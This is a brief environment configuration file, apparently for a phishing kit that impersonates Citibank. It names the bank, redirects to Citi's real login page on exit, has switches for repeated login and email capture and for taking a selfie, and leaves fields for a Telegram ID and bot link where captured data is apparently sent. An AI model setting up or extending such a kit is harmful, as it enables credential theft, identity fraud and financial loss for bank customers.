BANK_NAME=CITI
NEXT_PUBLIC_DOCS_PAGE=OFF
NEXT_PUBLIC_EXIT_URL=https://www.citi.com/login
NEXT_PUBLIC_DOUBLE_LOGIN=OFF
NEXT_PUBLIC_DOUBLE_EMAIL_LOGIN=OFF
NEXT_PUBLIC_TAKE_SELFIE=OFF
TELEGRAM_ID=
BOT_LINK=